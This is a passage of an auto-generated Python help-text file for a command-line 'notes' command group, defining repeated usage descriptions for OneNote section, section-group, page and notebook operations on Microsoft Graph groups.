| Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for groups" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: 